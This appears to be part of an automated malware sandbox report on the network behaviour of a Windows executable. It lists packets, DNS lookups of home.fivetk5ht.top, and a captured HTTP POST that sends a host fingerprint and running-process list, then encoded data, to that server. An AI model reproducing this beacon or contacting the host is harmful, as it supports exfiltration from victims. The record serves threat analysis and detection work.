                                                          Dec 20, 2024 16:44:48.092175961 CET4973480192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:48.211914062 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:48.212011099 CET4973480192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:48.303504944 CET4973480192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:48.423271894 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:48.423362017 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:48.423374891 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:48.423373938 CET4973480192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:48.423384905 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:48.423413992 CET4973480192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:48.423433065 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:48.423439026 CET4973480192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:48.423491955 CET4973480192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:48.423501015 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:48.423574924 CET4973480192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:48.423657894 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:48.423671961 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:48.423681974 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:48.423692942 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:48.423712015 CET4973480192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:48.423724890 CET4973480192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:48.423732996 CET4973480192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:48.543025017 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:48.543088913 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:48.543098927 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:48.543114901 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:48.543116093 CET4973480192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:48.543170929 CET4973480192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:48.543327093 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:48.543337107 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:48.543368101 CET4973480192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:48.543401957 CET4973480192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:48.586154938 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:48.586324930 CET4973480192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:48.705818892 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:48.705928087 CET4973480192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:48.749875069 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:48.869833946 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:48.869921923 CET4973480192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:49.073862076 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.073997974 CET4973480192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:49.197855949 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.198105097 CET4973480192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:49.198216915 CET4973480192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:49.318070889 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.318084955 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.318186998 CET4973480192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:49.318213940 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.318226099 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.318267107 CET4973480192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:49.318304062 CET4973480192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:49.318362951 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.318373919 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.318392038 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.318402052 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.318411112 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.318455935 CET4973480192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:49.318500042 CET4973480192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:49.318511963 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.318521976 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.318598032 CET4973480192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:49.318653107 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.318661928 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.318730116 CET4973480192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:49.318861008 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.318871975 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.318958044 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.318969965 CET4973480192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:49.318977118 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.318989038 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.319189072 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.319199085 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.319278002 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.319288015 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.319427013 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.319437981 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.319551945 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.320019960 CET4973480192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:49.438085079 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.438209057 CET4973480192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:49.438520908 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.438600063 CET4973480192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:49.438865900 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.438944101 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.438998938 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.439147949 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.439157963 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.439388037 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.439675093 CET4973480192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:49.439749956 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.439802885 CET4973480192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:49.439858913 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.439870119 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.439929008 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.439930916 CET4973480192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:49.440042019 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.440063953 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.440088987 CET4973480192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:49.440114975 CET4973480192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:49.440150023 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.440226078 CET4973480192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:49.440263987 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.440274954 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.440299988 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.440310001 CET4973480192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:49.440345049 CET4973480192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:49.440464020 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.440521002 CET4973480192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:49.440556049 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.440567017 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.440589905 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.440603018 CET4973480192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:49.440622091 CET4973480192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:49.440654993 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.440665007 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.440745115 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.440840960 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.440887928 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.440898895 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.440972090 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.441010952 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.441129923 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.441229105 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.441240072 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.441344023 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.441353083 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.441364050 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.441430092 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.441440105 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.441454887 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.441466093 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.441668987 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.441678047 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.441689014 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.441699028 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.441706896 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.441715956 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.441926003 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.441935062 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.441945076 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.441955090 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.441963911 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.441973925 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.489793062 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.489897013 CET4973480192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:49.490330935 CET4973480192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:49.559298992 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.559385061 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.559526920 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.559539080 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.559622049 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.559632063 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.559673071 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.559812069 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.559822083 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.560626984 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.560931921 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.561064959 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.561074972 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.561094999 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.561366081 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.561374903 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.561532974 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.561589003 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.561599016 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.561635017 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.561691999 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.561804056 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.561814070 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.561860085 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.561932087 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.561975956 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.562062979 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.562072992 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.562129021 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.562139034 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.562149048 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.562160969 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.562354088 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.562364101 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.562372923 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.562381983 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.562536001 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.562546015 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.562553883 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.562565088 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.562573910 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.562632084 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.562640905 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.562750101 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.562760115 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.562769890 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.563021898 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.563031912 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.563040018 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.563049078 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.563059092 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.563066959 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.563108921 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.563193083 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.563201904 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.563400030 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.563410044 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.563417912 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.563426971 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.563436985 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.563446045 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.563455105 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.563463926 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.609581947 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.609884977 CET8049734185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.830032110 CET4974280192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:49.949678898 CET8049742185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.949788094 CET4974280192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:49.954622984 CET4974280192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:50.074199915 CET8049742185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:51.228024006 CET8049742185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:51.228595972 CET8049742185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:51.228671074 CET4974280192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:51.229572058 CET4974280192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:51.349414110 CET8049742185.121.15.192192.168.2.5

                                                          UDP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Dec 20, 2024 16:44:39.846967936 CET6432353192.168.2.51.1.1.1
                                                          Dec 20, 2024 16:44:39.847059011 CET6432353192.168.2.51.1.1.1
                                                          Dec 20, 2024 16:44:39.984116077 CET53643231.1.1.1192.168.2.5
                                                          Dec 20, 2024 16:44:40.140192032 CET53643231.1.1.1192.168.2.5
                                                          Dec 20, 2024 16:44:44.474179029 CET5249353192.168.2.51.1.1.1
                                                          Dec 20, 2024 16:44:44.474304914 CET5249353192.168.2.51.1.1.1
                                                          Dec 20, 2024 16:44:44.611670971 CET53524931.1.1.1192.168.2.5
                                                          Dec 20, 2024 16:44:44.611685038 CET53524931.1.1.1192.168.2.5
                                                          Dec 20, 2024 16:44:46.229114056 CET5249553192.168.2.51.1.1.1
                                                          Dec 20, 2024 16:44:46.229202986 CET5249553192.168.2.51.1.1.1
                                                          Dec 20, 2024 16:44:46.367233992 CET53524951.1.1.1192.168.2.5
                                                          Dec 20, 2024 16:44:46.367263079 CET53524951.1.1.1192.168.2.5
                                                          Dec 20, 2024 16:44:47.953042984 CET5249753192.168.2.51.1.1.1
                                                          Dec 20, 2024 16:44:47.953113079 CET5249753192.168.2.51.1.1.1
                                                          Dec 20, 2024 16:44:48.091058969 CET53524971.1.1.1192.168.2.5
                                                          Dec 20, 2024 16:44:48.091109037 CET53524971.1.1.1192.168.2.5
                                                          Dec 20, 2024 16:44:49.691237926 CET5249953192.168.2.51.1.1.1
                                                          Dec 20, 2024 16:44:49.691332102 CET5249953192.168.2.51.1.1.1
                                                          Dec 20, 2024 16:44:49.828900099 CET53524991.1.1.1192.168.2.5
                                                          Dec 20, 2024 16:44:49.828921080 CET53524991.1.1.1192.168.2.5

                                                          DNS Queries

                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                          Dec 20, 2024 16:44:39.846967936 CET192.168.2.51.1.1.10xeee8Standard query (0)httpbin.orgA (IP address)IN (0x0001)false
                                                          Dec 20, 2024 16:44:39.847059011 CET192.168.2.51.1.1.10x5d39Standard query (0)httpbin.org28IN (0x0001)false
                                                          Dec 20, 2024 16:44:44.474179029 CET192.168.2.51.1.1.10x730Standard query (0)home.fivetk5ht.topA (IP address)IN (0x0001)false
                                                          Dec 20, 2024 16:44:44.474304914 CET192.168.2.51.1.1.10xec6dStandard query (0)home.fivetk5ht.top28IN (0x0001)false
                                                          Dec 20, 2024 16:44:46.229114056 CET192.168.2.51.1.1.10xa9bfStandard query (0)home.fivetk5ht.topA (IP address)IN (0x0001)false
                                                          Dec 20, 2024 16:44:46.229202986 CET192.168.2.51.1.1.10xce8cStandard query (0)home.fivetk5ht.top28IN (0x0001)false
                                                          Dec 20, 2024 16:44:47.953042984 CET192.168.2.51.1.1.10x7568Standard query (0)home.fivetk5ht.topA (IP address)IN (0x0001)false
                                                          Dec 20, 2024 16:44:47.953113079 CET192.168.2.51.1.1.10xc384Standard query (0)home.fivetk5ht.top28IN (0x0001)false
                                                          Dec 20, 2024 16:44:49.691237926 CET192.168.2.51.1.1.10xbf5dStandard query (0)home.fivetk5ht.topA (IP address)IN (0x0001)false
                                                          Dec 20, 2024 16:44:49.691332102 CET192.168.2.51.1.1.10x95f8Standard query (0)home.fivetk5ht.top28IN (0x0001)false

                                                          DNS Answers

                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                          Dec 20, 2024 16:44:40.140192032 CET1.1.1.1192.168.2.50xeee8No error (0)httpbin.org98.85.100.80A (IP address)IN (0x0001)false
                                                          Dec 20, 2024 16:44:40.140192032 CET1.1.1.1192.168.2.50xeee8No error (0)httpbin.org34.226.108.155A (IP address)IN (0x0001)false
                                                          Dec 20, 2024 16:44:44.611670971 CET1.1.1.1192.168.2.50x730No error (0)home.fivetk5ht.top185.121.15.192A (IP address)IN (0x0001)false
                                                          Dec 20, 2024 16:44:46.367233992 CET1.1.1.1192.168.2.50xa9bfNo error (0)home.fivetk5ht.top185.121.15.192A (IP address)IN (0x0001)false
                                                          Dec 20, 2024 16:44:48.091109037 CET1.1.1.1192.168.2.50x7568No error (0)home.fivetk5ht.top185.121.15.192A (IP address)IN (0x0001)false
                                                          Dec 20, 2024 16:44:49.828900099 CET1.1.1.1192.168.2.50xbf5dNo error (0)home.fivetk5ht.top185.121.15.192A (IP address)IN (0x0001)false

                                                          HTTP Request Dependency Graph

                                                          • httpbin.org
                                                          • home.fivetk5ht.top

                                                          HTTP Packets

                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          0192.168.2.549726185.121.15.192803148C:\Users\user\Desktop\5ZH9uXmzGP.exe
                                                          TimestampBytes transferredDirectionData
                                                          Dec 20, 2024 16:44:44.734338045 CET12360OUTPOST /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1
                                                          Host: home.fivetk5ht.top
                                                          Accept: */*
                                                          Content-Type: application/json
                                                          Content-Length: 500630
                                                          Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 30 39 34 38 32 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 [TRUNCATED]
                                                          Data Ascii: { "ip": "8.46.123.189", "current_time": "1734709482", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 38, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 332 }, { "name": "csrss.exe", "pid": 420 }, { "name": "wininit.exe", "pid": 496 }, { "name": "csrss.exe", "pid": 504 }, { "name": "winlogon.exe", "pid": 564 }, { "name": "services.exe", "pid": 632 }, { "name": "lsass.exe", "pid": 640 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 780 }, { "name": "fontdrvhost.exe", "pid": 788 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 924 }, { "name": "dwm.exe", "pid": 992 }, { "name": "svchost.exe", "pid": 444 }, { "name": "svchost.exe", "pid": 732 }, { "name": "svchost.exe", "pid": 280 }, { "name": "svchost.exe", "pid": [TRUNCATED]
                                                          Dec 20, 2024 16:44:44.854038954 CET2472OUTData Raw: 68 70 34 5a 39 66 2b 69 75 38 7a 2b 72 66 2b 4b 63 33 6a 64 5c 2f 30 56 50 68 58 5c 2f 77 43 48 76 69 37 5c 2f 41 4f 67 63 5c 2f 6c 47 71 4f 54 74 2b 50 39 4b 5c 2f 63 62 39 70 33 5c 2f 67 6c 72 6f 4f 67 36 42 38 53 64 57 5c 2f 5a 32 6c 38 52 61
                                                          Data Ascii: hp4Z9f+iu8z+rf+Kc3jd\/0VPhX\/wCHvi7\/AOgc\/lGqOTt+P9K\/cb9p3\/glroOg6B8SdW\/Z2l8Ralqnwx8W22nXXhbxDqMer6t4k8P3fw38A+MJp9OuYLOwhfWdP1HxJqixWMVnF9v05beCEPqFsBqH4hzwT2s8ttcwyQXEEjxTQyo0csUsbFXjkRgGV1YEMpAIIr938K\/GXgrxgy3F4\/hTEYyjiMvreyzHJc3pYbC5
                                                          Dec 20, 2024 16:44:44.854091883 CET9888OUTData Raw: 66 58 35 66 71 56 6a 73 38 78 33 48 5c 2f 62 4f 53 4d 63 2b 5c 2f 38 41 6e 36 66 53 6d 78 62 35 50 4a 5c 2f 67 54 5c 2f 70 6e 78 5c 2f 6e 50 2b 65 4b 6c 62 4d 6d 39 50 5c 2f 49 66 2b 50 31 5c 2f 7a 78 55 4f 50 34 50 34 5c 2f 4b 38 71 58 39 31 5c
                                                          Data Ascii: fX5fqVjs8x3H\/bOSMc+\/8An6fSmxb5PJ\/gT\/pnx\/nP+eKlbMm9P\/If+P1\/zxUOP4P4\/K8qX91\/y7\/56emK6DQh8zd\/tiSL979o\/wA\/4e1Cxz7d4+fzP3Uo\/wCW\/wDnjt\/OnybCET+OOXny\/wAvT\/P40+TO13f5H\/6Zxf4\/j70HQU2j52b4\/r\/n9OvaoWLybEz+Plf4f5+tXJo\/3mznZ5Xm\/wCOO
                                                          Dec 20, 2024 16:44:44.854163885 CET2472OUTData Raw: 5c 2f 77 41 2b 39 50 6b 5c 2f 65 62 48 64 49 33 38 76 39 31 5c 2f 72 66 2b 58 66 5c 2f 6c 30 78 33 71 62 79 55 32 6f 37 6a 65 6b 76 5c 2f 4c 50 7a 66 33 48 5c 2f 41 46 39 66 5c 2f 58 37 5c 2f 41 4b 31 57 2b 53 54 39 33 73 2b 65 4d 5c 2f 75 76 33
